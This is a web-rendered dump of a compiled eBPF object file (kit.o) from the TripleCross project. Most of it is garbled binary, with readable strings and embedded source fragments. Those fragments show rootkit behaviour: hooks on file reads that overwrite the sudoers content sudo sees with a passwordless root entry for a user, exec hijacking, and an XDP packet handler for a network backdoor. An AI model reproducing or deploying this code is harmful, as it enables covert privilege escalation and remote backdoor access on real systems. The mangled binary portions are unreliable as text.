Files
TripleCross/src/.output/kit.o

643 lines
74 KiB
Plaintext
Raw Normal View History

2022-05-04 08:54:21 -04:00
ELF>0!@@<00><1E>UH<55><48>H<EFBFBD><48>H<>}<7D>H<EFBFBD>}<7D>t)H<>E<EFBFBD>H<EFBFBD>H<><48>tH<>E<EFBFBD>H<EFBFBD>H<><48><EFBFBD>H<>E<EFBFBD>H<EFBFBD><48><EFBFBD><00><01><><EFBFBD>UH<55><48>H<EFBFBD><48> H<>}辨<00><00>H<>E<EFBFBD>H<EFBFBD>}<7D>u<07><00>EH<45>E<EFBFBD>H<EFBFBD><48><EFBFBD>h<00><>u H<>E<EFBFBD>H<EFBFBD>H<>U<EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD><00><>u H<>E<EFBFBD><45><15><><01>H<EFBFBD>E<EFBFBD>H<EFBFBD><48><EFBFBD>P<EFBFBD><50><EFBFBD><EFBFBD><00><>UH<55><48><EFBFBD><00>~<7E><><EFBFBD>]<5D>UH<55><48>H<EFBFBD><48>H<>}<7D>H<EFBFBD>E<EFBFBD>H<EFBFBD>H<><48><EFBFBD><00><>UH<55><48>H<EFBFBD><48> H<>}<7D><>H<00><00>H<>E<EFBFBD>H<EFBFBD>}<7D>u
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>E<EFBFBD>H<EFBFBD>U<EFBFBD>H<EFBFBD>H<>E<EFBFBD>H<EFBFBD>HH<>E<EFBFBD>H<EFBFBD>H<>PH<>E<EFBFBD>H<EFBFBD>PH<>E<EFBFBD>H<EFBFBD>P H<>E<EFBFBD><45>@(H<>E<EFBFBD><45>@,H<>E<EFBFBD><45>@,Hc<48>H<EFBFBD>E<EFBFBD><45>@(H<>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<><48>H<EFBFBD>E<EFBFBD>H<EFBFBD>P0H<30>E<EFBFBD>H<EFBFBD>@0H<30><48><0F>$H<>E<EFBFBD>H<EFBFBD>@0H<30>H<>H<>E<EFBFBD>H<EFBFBD>@0H<30>U<EFBFBD>H<EFBFBD><48>H<>PH<>E<EFBFBD>H<EFBFBD>@0H<30><48>H<>H<>H<>E<EFBFBD>H<EFBFBD>@0H<30><48>H<>U<EFBFBD>H<EFBFBD><48>H<>PH<>E<EFBFBD>H<EFBFBD>@0H<30><48>0H<30>H<>H<>E<EFBFBD>H<EFBFBD>@0H<30><48>0H<30>U<EFBFBD>H<EFBFBD><48> H<>PH<>E<EFBFBD>H<EFBFBD>@0H<30><48>HH<48>H<>H<>E<EFBFBD>H<EFBFBD>@0H<30><48>HH<48>U<EFBFBD>H<EFBFBD><48>(H<>PH<>E<EFBFBD>H<EFBFBD>@0H<30><48>HH<48>U<EFBFBD>H<EFBFBD> H<>PH<>E<EFBFBD>H<EFBFBD>@0H<30><48>`H<>H<>H<>E<EFBFBD>H<EFBFBD>@0H<30><48>`H<>U<EFBFBD>H<EFBFBD><48>0H<30>PH<>E<EFBFBD>H<EFBFBD>@0H<30><48>`H<>U<EFBFBD>H<EFBFBD>˜H<>PH<>E<EFBFBD><45>@8H<>E<EFBFBD><45>@<H<>E<EFBFBD><45>@<Hc<48>H<EFBFBD>E<EFBFBD><45>@8H<38>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<><48>H<EFBFBD>E<EFBFBD>H<EFBFBD>P@H<>E<EFBFBD>H<EFBFBD>@@H<><48><0F><>H<>E<EFBFBD>H<EFBFBD>@@H<>H<>H<>E<EFBFBD>H<EFBFBD>@@H<>U<EFBFBD>H<EFBFBD><48>8H<38>PH<>E<EFBFBD>H<EFBFBD>@@H<>U<EFBFBD>H<EFBFBD><48>hH<68>PH<>E<EFBFBD>H<EFBFBD>@@H<><48>H<>H<>H<>E<EFBFBD>H<EFBFBD>@@H<><48>H<>U<EFBFBD>H<EFBFBD><48>@H<>PH<>E<EFBFBD>H<EFBFBD>@@H<><48>H<>U<EFBFBD>H<EFBFBD><48>pH<70>PH<>E<EFBFBD>H<EFBFBD>@@H<><48>0H<30>H<>H<>E<EFBFBD>H<EFBFBD>@@H<><48>0H<30>U<EFBFBD>H<EFBFBD><48>HH<48>PH<>E<EFBFBD>H<EFBFBD>@@H<><48>0H<30>U<EFBFBD>H<EFBFBD><48>xH<78>PH<>E<EFBFBD>H<EFBFBD>@@H<><48>HH<48>H<>H<>E<EFBFBD>H<EFBFBD>@@H<><48>HH<48>U<EFBFBD>H<EFBFBD><48>PH<50>PH<>E<EFBFBD>H<EFBFBD>@@H<><48>HH<48>U<EFBFBD>H<EFBFBD><48><EFBFBD>H<EFBFBD>PH<>E<EFBFBD>H<EFBFBD>@@H<><48>`H<>H<>H<>E<EFBFBD>H<EFBFBD>@@H<><48>`H<>U<EFBFBD>H<EFBFBD><48>XH<58>PH<>E<EFBFBD>H<EFBFBD>@@H<><48>`H<>U<EFBFBD>H<EFBFBD>ˆH<>PH<>E<EFBFBD>H<EFBFBD>@@H<><48>xH<78>H<>H<>E<EFBFBD>H<EFBFBD>@@H<><48>xH<78>U<EFBFBD>H<EFBFBD><48>`H<>PH<>E<EFBFBD>H<EFBFBD>@@H<><48>xH<78>U<EFBFBD>H<EFBFBD>H<>PH<>E<EFBFBD>H<EFBFBD>@<18><>H<>E<EFBFBD>H<EFBFBD>H<>P<10><00><15><><01>H<EFBFBD>E<EFBFBD>H<EFBFBD><48><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><1E>UH<55><48>H<EFBFBD><48> H<>}<7D>H<EFBFBD>E<EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<>=<00>H<>H<>E<EFBFBD>H<EFBFBD>H<>E<EFBFBD>H<EFBFBD>U<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<>H<>E<EFBFBD>H<EFBFBD>H<>E<EFBFBD>H<EFBFBD>U<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<>H<>E<EFBFBD>H<EFBFBD>H<>E<EFBFBD>H<EFBFBD>U<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00><00><><EFBFBD><EFBFBD><1E>UH<55><48>H<EFBFBD><48> <20>}<7D>H<EFBFBD>u<EFBFBD>H<EFBFBD>U<EFBFBD><55>}<7D>u<0F><00><><01><>t<07><00>H<>H<>U<EFBFBD>H<EFBFBD>M<EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD><00><><EFBFBD><1E>UH<55><48>H<EFBFBD><48> dH<64>%(H<>E<EFBFBD>1<EFBFBD>H<EFBFBD>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD>ƿ<00><00><>t*H<>H<><48><EFBFBD>)<00>H<>=<00><00><00><00>H<EFBFBD>E<EFBFBD>dH+%(t<05><00><><EFBFBD><1E>UH<55><48><EFBFBD>}<7D><><01>]<5D><><1E>UH<55><48>H<EFBFBD><48>pH<70>}<7D>H<EFBFBD>u<EFBFBD>H<EFBFBD>U<EFBFBD>dH<64>%(H<>E<EFBFBD>1<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD><48><EFBFBD>H<>E<EFBFBD>H<EFBFBD><48><EFBFBD>H<>E<EFBFBD>H<EFBFBD>U<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD><48>H<EFBFBD><00> H<><48><EFBFBD>H<>E<EFBFBD><45><EFBFBD><00><>u5H<35>E<EFBFBD>H<EFBFBD>pH<>E<EFBFBD><45><EFBFBD>H<>E<EFBFBD><45>H<>E<EFBFBD>I<EFBFBD><49>H<EFBFBD><48>H<EFBFBD>=<00><00><00>EH<45>E<EFBFBD><45><EFBFBD><00><>t6H<36>E<EFBFBD><45><EFBFBD><00><>t'H<>E<EFBFBD><45><EFBFBD><00><>tH<>=<00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><05>H<>M<EFBFBD>dH+ %(t<05><00><><EFBFBD><1E>UH<55><48>H<EFBFBD><48>0<EFBFBD>}<7D>H<EFBFBD>u<EFBFBD>H<EFBFBD>E<EFBFBD><00><00>}<7D>v<0F><><00>}<7D>v<0F><><00>}<7D>tt/<2F>}<7D>t<0F><><00>}<7D>htu<74>}<7D>h<0F><><00>}<7D>:<0F><><00>}<7D>?tt<74><74>H<>H<><48><EFBFBD><00>E<EFBFBD>H<EFBFBD>H<><48>H<EFBFBD>=<00><00><00>}<7D><0F><>H<>=<00><00><00><00><01>xH<78>E<EFBFBD>H<EFBFBD>H<><48><EFBFBD><00><00><00><00><>H<EFBFBD>=<00><00><00><00><00><00><>H<EFBFBD>=<00><00><00><00>H<>E<EFBFBD>H<EFBFBD>H<><48><EFBFBD><00><00>H<>MЋE<D08B>H<EFBFBD>H<>Ή<EFBFBD><CE89><00>E<EFBFBD><45>}<7D><><0F><><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>=<3D><><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>5j<35><6A><EFBFBD><EFBFBD><00>H<>5Y<35><59><EFBFBD><EFBFBD><00><00><><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD>}<7D>u*H<>H<><48><EFBFBD>%<00>H<>=<00><00><00>4H<>E<EFBFBD>H<EFBFBD><48><EFBFBD>`<60><><EFBFBD><EFBFBD>E<EFBFBD><45>}<7D>t%H<>H<><48><EFBFBD>'<00>H<>=<00><00><><00><01><00>E<EFBFBD><45><00><01>H<>E<EFBFBD>H<EFBFBD><00><00><00>E<EFBFBD>H<EFBFBD>E<EFBFBD>H<EFBFBD>@H<><48><EFBFBD><00><00>H<>5<EFBFBD><35><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>E<EFBFBD>H<EFBFBD>}<7D>u)<29>E<EFBFBD><45><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<><48><EFBFBD><00>H<>=<00><00>@H<>=<00><00>#H<>E<EFBFBD><45>dH<><48><EFBFBD><00>E<EFBFBD><45>}<7D><>u <09>E<EFBFBD><00><0F><00><><01><>uϐH<CF90>E<EFBFBD>H<EFBFBD><48><EFBFBD><00>}<7D>t<07><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><05><00><>kit_bpfrb_commfs_openexec_var_hijack_activekit_bpf.rodatakit_bpf.bsshandle_sched_process_exectp_sys_enter_readtp_sys_exit_readtp_sys_enter_openattp_sys_enter_execvexdp_receiveELF<00>p<>@@<00><00><00>U<00><00>$yy<00>{
<EFBFBD><EFBFBD><00><><00><><EFBFBD><EFBFBD><00><00><><EFBFBD><EFBFBD>y{<1A><>y{<1A><>y0{<1A><>y({<1A><>y {<1A><>y{<1A><>y{<1A><>cz<63><7A>{j<><6A><00><><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><00><00><00><00><00><00>{
<EFBFBD><EFBFBD><00><><00><><EFBFBD><EFBFBD><00><00> <00><><EFBFBD><EFBFBD><07>yv<06>ar <00>enk<1A><>now hidd{<1A><>That is {<1A><><00>s<><73><EFBFBD>s<><73><EFBFBD>k<><6B><EFBFBD>{<7B><><EFBFBD>{<7B><><EFBFBD>s<><73><EFBFBD><00>LL #c<1A><>PASSWD:A{<1A><>:ALL) NO{<1A><>ALL=(ALL{<1A><>osboxes {<1A><>aq0<01>{*<2A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00>c<00>p <00><><EFBFBD><EFBFBD>m<08>q<><71><EFBFBD>T<00><00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>m<01>q<><71><EFBFBD>h<00><00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>m<01>q<><71><EFBFBD>U<01>i<00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>m<01>q<><71><EFBFBD>U<01>s<00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>m<01>q<><71><EFBFBD>U<01> <00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>m<01>q<><71><EFBFBD>U<01>w<00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>m<01>q<><71><EFBFBD>U<01>o<00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>mq<><71><EFBFBD>U}n<00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>muq<><71><EFBFBD>Us'<00>c <00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>mkq<><71><EFBFBD>Uit<00>c
2022-05-04 08:54:21 -04:00
<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>maq<><71><EFBFBD>U_ <00>c <00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>mWq<><71><EFBFBD>UUb<00>c <00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>mMq<><71><EFBFBD>UKe<00>c <00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>mCq<><71><EFBFBD>UA <00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>m9q<><71><EFBFBD>U7s<00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>m/q<><71><EFBFBD>U-e<00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>m%q<><71><EFBFBD>U#e<00>c<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>p<00>mq<><71><EFBFBD>Un<00>y<><79><EFBFBD><00>d<00><00>s $<00><00>4<00><00>s<00><00><><00><><EFBFBD><EFBFBD><EFBFBD>a<00><00>$<00> m &<00><><00><00><><00><><EFBFBD><EFBFBD><EFBFBD>a<00>$<00>$e<00><><EFBFBD><EFBFBD><00><00><00> <00><><EFBFBD><EFBFBD><00><><00>#s<1A><><00>% <00><00>aq<00><><00><><EFBFBD><EFBFBD><EFBFBD><00>$e<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>3<00><00><00><00><00> <00><>L<00><00><00><><00><00><00>{j<><6A><00> {<7B><><EFBFBD>{<7B><><EFBFBD><00><><00><><EFBFBD><EFBFBD><EFBFBD><00><00><><EFBFBD><EFBFBD>g <00> m Os<><73><EFBFBD>c<><63><EFBFBD>{<7B><><EFBFBD>ys<00><><00><><EFBFBD><EFBFBD><EFBFBD>q<00> <00>p{<7B><><EFBFBD>w cj<63><6A>{<7B><><EFBFBD>{<7B><><EFBFBD>{<7B><><EFBFBD>{<7B><><EFBFBD>{<7B><><EFBFBD>{<7B><><EFBFBD><00><><00><><EFBFBD><EFBFBD><EFBFBD> <00>s<00><00><><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><00>q<><71><EFBFBD>s%q<><71><EFBFBD>U#uq<><71><EFBFBD>U!dq<><71><EFBFBD>Uoq<><71><EFBFBD>Uq<><71><EFBFBD>/q<><71><EFBFBD>Ueq<><71><EFBFBD>Utq<><71><EFBFBD>Ucq<><71><EFBFBD>U/q<><71><EFBFBD>Usq<><71><EFBFBD>U uq<><71><EFBFBD>U dq<><71><EFBFBD>U oq<><71><EFBFBD>Ueq<><71><EFBFBD>Urq<><71><EFBFBD>Us<00> q<><71><EFBFBD><00> c<><63><EFBFBD><00><><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><00><00><00><><00><00>a<00><00><00>abag<00>x=<3D><00><00>y "=<3D><00><00><00><00>q<> U<01><><00>q6=<00><>i<> #(i<><00><00><00>adac$<00><00><00><>{*<2A><>3<00><00>i<><00>i<> wW<q<>gW<#<00><> <00>1g w y<><79><EFBFBD>U <00>A=B<00><><00>A y<><79><EFBFBD>=[[<00><>D<00><00><00><>qAgqBO!qBqFgO&<00><00>aW<00>Vj<00><00>G<00><00>tW<00><00>j<00><00>F<00><00>dqAgqBO!qB
qF gO&<00><00>aW<00>xx<00><00>G<00><00>tW<00>x<00><00>F<00><00>dqAgqBO!qF gqB
O&<00>qA qB gO<00>&<00>aW<00><00><00><00>W<00>)<00><00><00><00><00>j<>]<00>6<00>C{J<><4A><00> <00>y<><79><EFBFBD>qAX<00>\<5C>qAU<01><>DqAU<01><>PqAU<01><>_qAU<01><>PqAU<01><>oqAU<01><>CqAU<01><>_qAU<01><>0<00><00>y<><79><EFBFBD><00>iq
girO!ir k*<2A><>c<1A><>iqgirO!irisgO#g O{:<3A><>a<> g a<>O!a<>c*<2A><>{<1A><>a<>a<>g O{*<2A><>a<>g a<>O!a<>c*<2A><>{<1A><>a<>a<> g O{*<2A><><00>a<00><00>A
<00><00>4<00><00><00><><EFBFBD><EFBFBD>{<1A><><00>ab<00>!"{<1A><>aa{*<2A><>{*<2A><>=!<00>
y<><79><EFBFBD>=!
y<><79><EFBFBD>6=!V0<00>&<00><00><><EFBFBD><EFBFBD>{<1A><><00><00><00>Gy<><79><EFBFBD><00><00> aa{<1A><>aiy<><79><EFBFBD>=<00># <00>&<00>y<><79><EFBFBD>{z<><7A>y<><79><EFBFBD>y<><79><EFBFBD>s<00><>y<><79><EFBFBD>3<00>)<00>\<00><00><><00><><00>ac{<00>*<00><><00><>y<><79><EFBFBD>=!y<><79><EFBFBD>=G<00>y<><79><EFBFBD>i#<00>y<><79><EFBFBD>i wW<q"gW<#{:<3A><><00>2g w <00>9[-#gm<00><00><>i<><69><EFBFBD>y<><79><EFBFBD>k a<><61><EFBFBD>kwk
y<><79><EFBFBD><00>w0k#<00>w k#kwka<><61><EFBFBD>y<><79><EFBFBD>cy<><79><EFBFBD>cw c y<><79><EFBFBD>cw ca<><61><EFBFBD>y<><79><EFBFBD>cy<><79><EFBFBD>cw c y<><79><EFBFBD>cw ci<>
i<>V<00><00>i<><00><00>k<00><00>{<1A><>k(
<00><00>*<00><00><><00><00><00><00><00><><00><00><00><00>wW<00><>W<00><><00>wW<00><>W<00><><00>wW<00><>W<00><><00>w<00><00><><EFBFBD><EFBFBD>y<EFBFBD><79><EFBFBD>k
i#i$
2022-05-04 08:54:21 -04:00
o<00><00><00>O<>y<><79><EFBFBD><00>(<00>!'=<00>yy<><79><EFBFBD>g w <00><>-<2D>q<00><00><>s&s%s$s#s"s!s sssssssssssssssssss s s s
s sssssssss<00>'y<><79><EFBFBD>m!I<00><>'-<2D>Fy<><79><EFBFBD><00><><EFBFBD><EFBFBD>g w !-<2D>C<00>)<00><>s&<00>;s%<00>ds!s <00>ns#s<00>bs<00>gs<00>ass<00>ms <00>sssss <00>us
<00>os <00>iss<00>vs<00>rs<00>ps<00> s$ssss s<00>es"ssssss<00>hsss<00>Ts <00><00>&<00><><00><00><00>-<00><00><00>5y<><79><EFBFBD><00><>y<><79><EFBFBD><00><00><>Error
Bound check fail ABDE %i
D: %ld, DE:%ldDetected 9000
GF, PS:%i, P:%i, DE:%i
GReceived valid TCP packet with payload %s of size %i
HOLD data_end: %i, payload: %i
Control back to main program with retcode %i after expanding %i bytes
Bound check A failed while expanding
Bound check B failed while expanding
Bound check D failed while expanding
Unlikely you are here, but OK
Bound check E failed while expanding
Bound check F failed while expanding
BPF finished with ret %i and payload %s of size %i
BPF finished with error on expansion
Previous length: %i, current length: %i
NEW data_end: %i, payload: %i
And on NEW CTX data_end: %i, payload: %i
Error writing to user memory
Error writing to user memory in additional symbol
Sudo overwritten
Overwritting at pid %u, %s
Filename is %s
and program name is %s
Error writing to user memory
2022-05-04 08:54:21 -04:00
FAIL CHECK 1
FAIL CHECK 2
FAIL CHECK 3
Finished backdoor V1 check
Failed to expand a tcp packet reserved bytes by %i
Bound check A failed while expanding
Bound check B failed while expanding
Bound check C failed while expanding
before: %i, checksum %u
after: %i, checksum %u
csum: %u for data_start %u, data_size %i
Invalid attempt to substitute the payload A
Invalid attempt to substitute the payload C
2022-05-04 08:54:21 -04:00
Dual BSD/GPLThat is now hiddenosboxes ALL=(ALL:ALL) NOPASSWD:ALL #<00><><00><00><00>+  %*@6
 >D@[8hl@o`s<00><00><00><00><00><01><00> <00> % * @<00> <00><00><00><00><00>Ho<00> <00>@@<00> % * @<00> <00><00><00>*M Q#@o$`e$<00>m&<00>t%!<00>"<00>"o <00><00><00><00>%<00> <00><00> '*m(<00><00>@<00>`l+<00>h<00><00>,<00>@<00>+ <00>)<00> -0<00><00><00>@<00>1<00><00>@ <00>/<00> 25<00> (<00><00>@<00>`
<00><00><00><00>
6 
! <00>4
 7:<00> (<00><00>@<00>`<00>;<00><00> =<00><00> =<
>
2022-05-04 08:54:21 -04:00
; <00>9<00>  ?Bh o t  } @<00> `<00> <00><00> <00> <00>A<00>  C<00> <00><00>F<04>F<04>F<00>G<00>G <00>G0<00>F@<00>FH<00>IPJ`J<00> "H!H&<00><00><00>G<00>GJ J@H`HdHhHi!Hj%Hk)Hl-Hm1Hn5Ho9Gp<00>I<00>@G<00><<00>&L <00>&N 'P<'R<%'T;'T<Q'W<g'Y}'Y<00>'T<<00>']<00>'T<6<00>'`<00>'T<(c<G(e<&0(gG(g^(gu(c<00>(g<00>(g<5<00>(n<00>(g<)<00>(q<00>(c<*)t<-)v<3M)x<p)z<<00>)|<<00>)~<<00>)<0E><00>)v<*<0E>B*<0E>h*<0E><00>*|<4<00>*<0E><00>*g<00>*g +g<E+<0E>j+<0E><00>+t<-<00>+<0E><00>+<0E><00>+O<00>+  <00>+-MSUVXZ$[3\B^D_[a]6b<00>d<00>f<00>Gh<00>&i!&jG&kml<00>&m<00>&o<00>5p &r3)s\u{*w<00>y<00>3{<00>}$<00>4<00>L<00>j<00>x<00><00><00><00><00><00>4<00><00>&<00>
&<00>0&<00>V<00>o<00><00>*<00><00>-<00><00>-<00>+Q int__ARRAY_SIZE_TYPE__ring_buffertypemax_entriesrb_comm__u64long long unsigned intfs_open_databuffdpidprogram_namefilenameis_sudochar__u32unsigned intfs_priv_openkeyvaluefs_openexec_var_hijack_active_datahijack_stateargv0exec_var_priv_hijack_activeexec_var_hijack_activetrace_event_raw_sched_process_execent__data_loc_filenameold_pid__datatrace_entryflagspreempt_countunsigned shortunsigned charu32pid_t__kernel_pid_tctxhandle_sched_process_exectp/sched/sched_process_exec/home/osboxes/TFG/src/ebpf/include/bpf/sched.h pid_t pid = bpf_get_current_pid_tgid() >> 32; return 0;sys_read_enter_ctxunused__syscall_nrpaddingcountlong unsigned intsize_ttp_sys_enter_readtp/syscalls/sys_enter_read/home/osboxes/TFG/src/ebpf/include/bpf/fs.h if (ctx == NULL){ bpf_printk("Error\n"); char *buf = (char*) ctx->buf; int fd = (int) ctx->fd; __u64 pid_tgid = bpf_get_current_pid_tgid(); struct fs_open_data *stored_data = (struct fs_open_data*) bpf_map_lookup_elem(&fs_open, &pid_tgid); if (stored_data == NULL){ struct fs_open_data data = *stored_data; data.fd = fd; data.buf = buf; bpf_map_update_elem(&fs_open, &pid_tgid, &data, BPF_EXIST);} sys_read_exit_ctxretlong inttp_sys_exit_readtp/syscalls/sys_exit_read struct fs_open_data *data = (struct fs_open_data*) bpf_map_lookup_elem(&fs_open, &pid_tgid); if (data == NULL || data->buf == NULL){ __u32 pid = data->pid; char msg_overwrite[] = STRING_FS_OVERWRITE; char c_buf[sizeof(msg_overwrite)] = {0}; char sudo_line_overwrite[] = STRING_FS_SUDOERS_ENTRY; if(data->is_sudo==1){ if(bpf_probe_read_user(c_buf+ii, 1, buf+ii)<0){ bpf_printk("Overwritting at pid %u, %s\n", pid, buf); bpf_printk("Filename is %s\n", data->filename); bpf_printk("and program name is %s\n", data->program_name); if(bpf_probe_write_user((void*)buf, (void*)msg_overwrite, (__u32)sizeof(msg_overwrite)-1)<0){} if(bpf_probe_write_user((void*)buf, (void*)sudo_line_overwrite, (__u32)STRING_FS_SUDOERS_ENTRY_LEN-1)<0){ bpf_printk("Error writing to user memory\n"); char char_override = '#'; for (int ii = 0; ii<CHARS_TO_OVERRIDE; ii++){ if(bpf_probe_write_user((void*)buf+ STRING_FS_SUDOERS_ENTRY_LEN+ii, (void*)&char_override, (__u32)1)<0){ bpf_printk("Error writing to user memory in additional symbol\n"); bpf_printk("Sudo overwritten\n"); bpf_printk("Error writing to user memory\n");sys_openat_enter_ctxdfdmodeumode_ttp_sys_enter_openattp/syscalls/sys_enter_openatint tp_sys_enter_openat(struct sys_openat_enter_ctx *ctx){ char comm[TASK_COMM_LEN] = {0}; int err = bpf_get_current_comm(comm, sizeof(comm)); if(err < 0){ char filename[STRING_FS_SUDOERS_FILE_LEN] = {0}; bpf_probe_read_user(&filename, STRING_FS_SUDOERS_FILE_LEN, (char*)ctx->filename); struct fs_open_data data = { __u32 pid = pid_tgid >> 32; bpf_probe_read(data.filename, STRING_FS_SUDOERS_FILE_LEN, filename); bpf_probe_read(data.program_name, FS_OPEN_DATA_PROGRAM_NAME_SIZE, comm);/home/osboxes/TFG/src/ebpf/include/bpf/../utils/strings.h if (str1[ii] != str2[ii]){sys_execve_enter_ctxargvenvptp_sys_enter_execvetp/syscalls/sys_enter_execve/home/osboxes/TFG/src/ebpf/include/bpf/exec.h if(hijacker_state == 1 || EXEC_HIJACK_ACTIVE_TEMP == 0){xdp_mddatadata_enddata_metaingress_ifindexrx_queue_indexegress_ifindexxdp_receivexdp_prog/home/osboxes/TFG/src/ebpf/kit.bpf.cint xdp_receive(struct xdp_md *ctx){0:1 void *data_end = (void *)(long)ctx->data_end;0:0 void *data = (void *)(long)ctx->data;/home/osboxes/TFG/src/ebpf/include/packet/packet_manager.h if ((void *)eth + sizeof(struct ethhdr) > data_end){ if(ethernet_header_bound_check(eth, data_end)<0){ bpf_printk("Bound check fail A"); if ((void *)ip + sizeof(*ip) > data_end){ if (ip_header_bound_check(
8<00> @<00> D<00>3<0E>b<02><00><00> l<00>* p0<00>I<1E>8<00>l<19>@<00><00><16>H<00><00> <0B>X<00>I<1E>`<00><00>?<00><00>" <00><00>@ <00>m $<00> <00>0<00><00>,X<00><00><01>g<00><00><16><00> <00> 8DP<00><00>HX<00><00>H`<00><00> Hh<00><00>hx<00><00>
p<00><00><00>
t<00><00>%
|X<00>_<0E>`<00>_<08>x<00><00><00>y <00><00>y <00><00>y0<00><00>y%<00><00>y <00>y  <00>y00<00>y%@<00>y X<00>y p<00>y0<00><00>y%<00><00>y <00><00>y <00><00>y0<00><00>y%<00><00>y <00><00>y <00>y0 <00>y%0<00>y H<00>y `<00>y0p<00>y%<00><00>y <00><00>y <00><00>y0<00><00>y%<00><00>y <00><00>y <00>y0<00>y% <00>y 8<00>y P<00>y0`<00>y%p<00>y <00><00>y <00><00>y0<00><00>y%<00><00>y <00><00>y <00><00>y0<00>y%<00>y (<00>y @<00>y0P<00>y%`<00>y x<00>y <00><00>y0<00><00>y%<00><00>y <00><00>y <00><00>y0<00><00>y%<00>y <00>y 0<00>y0@<00>y%P<00>y h<00>y <00><00>y0<00><00>y%<00><00>y <00><00>y <00><00>y0<00><00>y%<00><00>y <00>y  <00><00>TP<00><00>X<00><00>\<00><00><00><00>_`<00><00>_`<00><00><00><01><00><00> <0C> <00><00> <0C>(<00>5 <0A>h<00>o<0E><00><00><00><1C><00><00><00> <09><00><00><00><10><00><00><00><00><00><10><00><00><00><10><00><00>< <11><00><00><00> <09> <00><00> d)
8<00>F
<00><00><00><16>(<00><00>
<EFBFBD>@<00>H<00><00>
<0F>x<00><00>
<08><00><00><00>
<EFBFBD><00><00># L<><00><00><00>
<EFBFBD><00><00># <05><00><00>y <19><00><00><00> <1A><00><00>y <20><00><00>y <19> <00><00> <05>8<00>y <19>P<00><00>
2022-05-04 08:54:21 -04:00
<EFBFBD>X<00> <05>hP <00> ppP <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> pP <00> pP <00> pP <00> pP <00> p P <00> p(P <00> p0P <00> p8P <00> p@P <00> pHP <00> pPP <00> pXP <00> p`P <00> phP <00> ppP <00> pxP <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00><00><00><00><00> <00> <00> <00><16><00> + d <00> <00><01><00> <00><00> <00> <00><00> )<29><00> N%<25>x<00>0(<00> <00>0<00> " PxLL`<00> z ,h<00> <00> 0x<00> <00><00> <00><01><00>x1<10><00><00> K @<00>xwh<00><00> <00> X<00><00> <00> \<00>H<00> 4<00><00> <00> l<00><00> <00> p<00>  t@<00> X<00> Y<05>x<00> <00><14><00><00> <00>3<><00><00> <00>8<><00><00> <00>+<2B><00><00> <00>D<><00><00> <00>H<><00><00> <00>=<3D><00><00> <00><1B><00><00> <00><08>x6<18><00> i <0A> <00> <00> <0A>8x6<18>H<00> <00> <09>X<00>  <09>p<00> ) <09><00>y<00>p<00>y<00>t<00>yG#|<00>yy <0C><00>y<00> <0A>(yy<17>0yy <0C>8y<00> <0A>hy<00><05><00>y<05><00>yg#<23><00>y<00> <0C><00>y<00> <0A><00>y<00><17>y<00> <0C>y<00> <0A>8y<00><05>Xy<05>xy6#<23><00>yw<05><00>y62<><00>y<00> <0C><00>y<00> <0A><00>y<00><17><00>y<00> <0C><00>y<00> <0A>y<05>0<00> E<05>pP <00> pxP <00> p<00><00> <00> <09><00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> p<00>P <00> pP <00> pP <00> pP 